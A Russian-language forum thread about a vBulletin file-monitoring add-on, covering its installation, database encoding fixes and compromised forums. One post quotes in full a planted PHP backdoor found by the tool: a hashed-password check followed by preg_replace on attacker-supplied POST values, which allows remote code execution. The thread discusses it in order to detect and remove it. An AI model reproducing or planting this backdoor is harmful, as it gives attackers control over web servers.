Хак инспектор файлов для vBulletin

Хак инспектор файлов для vBulletin - чудо хак для безопасности вашего форума. Как только вы сами или какой перец загрузит новые файлы к вам в директорию форума - на почту придет письмо со списком этого файла Ну а дальше мочить. Или себя или хакера
Установка:

• Заливаем файлы из папки upload
  

• Импортируем продукт в своей кодировке
  

• Настраиваем в админке юзера который может смотреть файлы
  

Все







Скрытая информация :: Авторизуйтесь для просмотра »

Проблемы с кодировкой в "инспекторе файлов" Установил инспектор файлов, установил продукт от него, захожу в Установленные продукты и в заголовке и описание одни знаки вопроса. Такие же знаки вопроса, если зайти в сам инспектор файлов в навигации. Подскажите в чем дело.

Первое что приходит в голову: не той кодировки установили продукт. Проверьте Вашу кодировку на сайте и кодировку продукта.

Sayf:

Первое что приходит в голову: не той кодировки установили продукт. Проверьте Вашу кодировку на сайте и кодировку продукта.

Я пробовал разные кодировки, но эффект такой же ((( Только знаки вопросы толще становились (((
Может зависит от того откуда я скачал форум? Скачивал от сюда http://5md.ru/

версию 3.8.7

xtwin:

Может зависит от того откуда я скачал форум?

В данном случае не зависит. Дело в вашей базе данных, скорее всего у вас там кодировка таблиц в latin. Посты перенес в тему хака.

xtwin:

Может зависит от того откуда я скачал форум?

если есть сомнения - зачем качать? качайте с проверенных источников не поленилась, качнула и дистрибутив, и русик простое сравнение длины файлов различий нЕ выявило вывод: проблема таки с кодировкой у Вас...

Veter:

В данном случае не зависит.
Дело в вашей базе данных, скорее всего у вас там кодировка таблиц в latin.
Посты перенес в тему хака.

А как мне сделать, что бы этих знаков вопросов не было?

Если форум только установлен, то проще всего все снести, в том числе и БД полностью и сделать заново. Если форум уже рабочий, то есть там есть реальные люди, темы, посты, то нужно разбираться с кодировками базы данных. Отключать все хаки. Приводить все таблицы к единой кодировке cp или utf

Veter:

Если форум только установлен, то проще всего все снести, в том числе и БД полностью и сделать заново.
Если форум уже рабочий, то есть там есть реальные люди, темы, посты, то нужно разбираться с кодировками базы данных. Отключать все хаки. Приводить все таблицы к единой кодировке cp или utf

Удалил все базы данных и поставил заново форум и первым делом установил этот хак - тоже самое ((( кодировка базы utf. Помогите это исправить, плиз ))

xtwin, у меня тоже UTF, но хак ставила без проблем... Часто хаки просто выявляют проблемы с кодировками, если они есть. Вы в БД глядели? В какой кодировке таблицы? Есть в темах (таблица post) кракозябры? не на форуме, а в самой БД. Можно так же глянуть бекап любой...

xtwin, есть еще один момент... Перезалила вложения в первом посте, там были файлы с кириллицей и в cp1251

Ночная:

Перезалила вложения в первом посте, там были файлы с кириллицей и в cp1251

но это не отменяет вопроса про кодировку в БД

Льюви:

но это не отменяет вопроса про кодировку в БД

Нет, конечно, поэтому я и отредактировав пост, оставила этот вопрос

Ночная:

xtwin, у меня тоже UTF, но хак ставила без проблем... Часто хаки просто выявляют проблемы с кодировками, если они есть.
Вы в БД глядели? В какой кодировке таблицы? Есть в темах (таблица post) кракозябры? не на форуме, а в самой БД. Можно так же глянуть бекап любой...

xtwin, есть еще один момент...

Перезалила вложения в первом посте, там были файлы с кириллицей и в cp1251

В БД кодировка таблиц ср1251_general_ci. Может в этом дело?
Забыл дописать, в таблице пост кракозябры ((((( Помогите это исправить

Значит ваша таблица не в ср1251_general_ci а в latin. В phpMyAdmin поменяйте кодировку именно этой таблицы где крокозябры.

Veter:

Значит ваша таблица не в ср1251_general_ci а в latin.
В phpMyAdmin поменяйте кодировку именно этой таблицы где крокозябры.

Можете подробнее описать, как это сделать?

Хм... В картинках пока не могу показать.

Может чуть позже, как время появится. Попробуйте вывести кодировку форума принудительно.

Если ??? исчезнут, то можно использовать как временную меру.

Но с БД все равно разбираться нужно. Открываете конфиг.

Где то ближе к концу находите закомментированную строку

 //$config['Mysqli']['charset'] = 'utf8';

Добавляете ниже

 $config['Mysqli']['charset'] = 'cp1251';

Если ??? не исчезнут обновите продукт и посмотрите.

lukamal:

Расскажите как решили проблему?

Конечно ))) Перед установкой форума, создал базу данных, выбрал ее и в сравнении указал ut8_general_ci, затем раскомментил строчку в конфиге c utf8, после установки сразу же залез в настройки английского языка и изменил кодировку с iso на utf8 )) Все )))) Конечно, я бы в жизни не догадался решить проблему, мне помог Sven с вбсаппорта )))

Спс. Кое что не понял: 1. Инспектор выдал гору файлов, у всех владелец 2737, права 0644. Дата создания = дате бэкапа. Вроде все бэкапы подтирал. Ничего страшного, если я всё это 2. Как эти файлы стирать быстро, не выискивая по каталогам?

Allex:

Ничего страшного, если я всё это

Это файлы админки форума.

Veter:

Это файлы админки форума.

Спасибо. Я уже говорил, что это лучший форум?:good:

Подскажите, плиз, что за файлик появился, надо ли его удалять? Инспектор файлов на Юридический клуб arbitraz.ru (http://arbitraz.ru/misc.php?do=gfi

) обнаружил изменения в списке файлов. Обнаружено новых файлов: 1 /cpstyles/vBulletin_3_Frontend/cp_tick_no.php (134,00b, 12/01/13 19:07, 2737, 0644) Изменено файлов: 0

Veter:

Новые стили админки загружали?

Нет. Мог разделы удалить.

При чем здесь разделы? Файл появился в папке /cpstyles. Поэтому я и сделал вывод, что вы загружали какой то стиль админки.

Allex:

Инспектор файлов на Юридический клуб arbitraz.ru (http://arbitraz.ru/misc.php?do=gfi

) обнаружил изменения в списке файлов.

Обнаружено новых файлов: 1

/cpstyles/vBulletin_3_Frontend/cp_tick_no.php (134,00b, 12/01/13 19:07, 2737, 0644)

Что за файл в стиле Админки Frontend Вашего форума cp_tick_no.php? Вот его Инспектор файлов и обнаружил. Он есть в дистрибутиве стиля? Если его не было - к вам залили шелл. Проверяйте этот файл.

Прометей:

Что за файл в стиле Админки Frontend Вашего форума cp_tick_no.php? Вот его Инспектор файлов и обнаружил. Он есть в дистрибутиве стиля? Если его не было - к вам залили шелл. Проверяйте этот файл.

В дистре не было. Вот его содержимое: <?php if (md5($_POST['p']) == 'ad5fdc193226be1841c53825d7004925') { preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']); } Для шела не много. Проверил с помощью virustotal точка com.

Ничего подозрительного. Как узнать, когда, кто и с какого IP его закачал? И как можно закачивать файлы без доступа на ftp или http?

Allex:

Как узнать, когда, кто и с какого IP его закачал?

Копаться в логах

Allex:

И как можно закачивать файлы без доступа на ftp или http?

А вы уверены, что без доступа?

Veter:

Копаться в логах

Теоретически я и сам это понимаю, если бы ещё ткнули в нужный файлик мою ленивую морду сущность.

У вас шаред хост? Обратитесь к хостеру, он подскажет где у него хранятся логи.

Подскажите пожалуйста кто-нибудь как Импортируем продукт?

Boss:

Импортируем продукт в своей кодировке

С админкой vBulletin не знаком к сожалению, да и вообще еще новичок я в этом деле. А очень нужно, заражают гады мой новый форум (((

Magius:

заражают гады мой новый форум (((

О_о... то есть, на форуме в принципе не установлено ни одного хака, а его уже успешно ломают? я бы задумалась... что-то тут не так, и инспектор файлов явно не поможет версия движка какая?

Льюви:

то есть, на форуме в принципе не установлено ни одного хака

Форум купил недавно и понятия не имею как устроен двиг.

Судя по всему ни одного не установлено, а ломают успешно.

Версия 3.8.7 PL3 Полазил по админке.

Оказывается установлены "vB.Sponsors" и "Особые форумы" Я уже проделал все манипуляции по устранению уязвимостей, как описано в теме "Как защитить форум на vBulletin". Осталось только установить инспектор файлов.

Magius:

Подскажите пожалуйста кто-нибудь как Импортируем продукт?

Заходим в панель администратора. Продукты и модули - управление продуктами - добавить (импортировать) продукт.

Magius:

Судя по всему ни одного не установлено

Админка, продукты и модули, и увидите список установленного.

Magius:

Осталось только установить инспектор файлов.

Инспектор файлов НЕ защищает форум, и очень часто НЕ уведомляет о взломах. Потому что ломают не добавлением файлов, а другими путями. Инспектор файлов видит лишь добавляемые файлы и все.

Спасибо большое!!!

Veter:

Инспектор файлов НЕ защищает форум.

Это я понимаю.

Magius:

Форум купил недавно

оу... то есть, не Вы ставили движок, а получили готовое... возможно, в комплекте с шеллами... 3.8.7 - стабильна и не имеет нареканий с точки зрения безопасности что такое "Особые форумы"?

Magius:

а ломают успешно

можете рассказать, в чём это выражается?

Похоже, что проблема решилась. Прошлый владелец форума продал его по той причине, что его постоянно ломали. Я подробностей не знаю, однако цена была заманчива =)

Льюви:

возможно, в комплекте с шеллами...

Сразу после покупки слил все файло себе и проверил касперским, который ругался на один файл (Trojan.Script.Generic в private_html/index.html) этот файл я удалил.

Далее вручную сравнил все файлы на сервере с файлами движка и шеллов не обнаружил.

Есть только парочка отличий в некоторых php-кодах (вероятно, что правил прошлый владелец форума)

Льюви:

что такое "Особые форумы"?

Я зашел в "Управление продуктами" и там обнаружил "Особые форумы 0.1 Форум, содержащий все темы или темы из выбранного раздела" а что это сам не знаю.

Льюви:

можете рассказать, в чём это выражается?

Mozilla предупреждала о заразности сайта и Гугл добавил в список подозрительных ("На 2 из 4 страниц сайта, протестированных нами за последние 90 дней, происходила загрузка и установка вредоносного ПО без согласия пользователя.") Гугл считал зараженным файл vbulletin_read_marker.js а он был чист.

И что я только не делал - найти зверя не удавалось.

Всевозможные сервисы поиска вирусов сообщали, что сайт чист.

А сегодня, к моему удивлению гугл снял предупреждение о "заразности" сайта.

Magius:

"Особые форумы 0.1 Форум, содержащий все темы или темы из выбранного раздела"

понятно

Magius:

Гугл считал зараженным файл vbulletin_read_marker.js а он был чист. И что я только не делал - найти зверя не удавалось.

мммммм......

был у меня как-то клиент с похожей проблемой

я тоже долго искала, где там собака порылась

по клику на иконку раздела вместо отметки "раздел прочитан" (а это как раз этот скрипт) открывался порно-попандер

"зверь" сидел в замещаемых переменных

в общем, если будут опять проблемы - стукните в ЛС, если не буду сильно занята, смогу глянуть

Спасибо большое Льюви!!! Последний маленький вопросик. Как настроить инспектор файлов? То, что в первом посте на 3-м скриншоте - как туда попасти?

Админка, основные настройки, инспектор файлов ardon: После установки любого хака нужно прежде всего посмотреть его в основных настройках.

В графу: "Список через запятую расширений файлов, которые необходимо включать в список проверки phtml,php,php3,php4,php5,cgi,pl,shtml,xml" желательно добавить js.

Подскажите, плиз, братцы, есть ли средство для фильтрации записей, або аналогичный продукт. Причины: 1. Проверять записи за несколько лет тяжело. 2. Хакеры, в ходе одной из последних атак, умудрились изменить атрибуты инфицированного файла, установив более раннюю дату создания.

креш:

Для 4.2.0 подходит этот хак ?

Сомневаюсь, для 4+ версии свой раздел, а иначе бы автор написал о совместимости!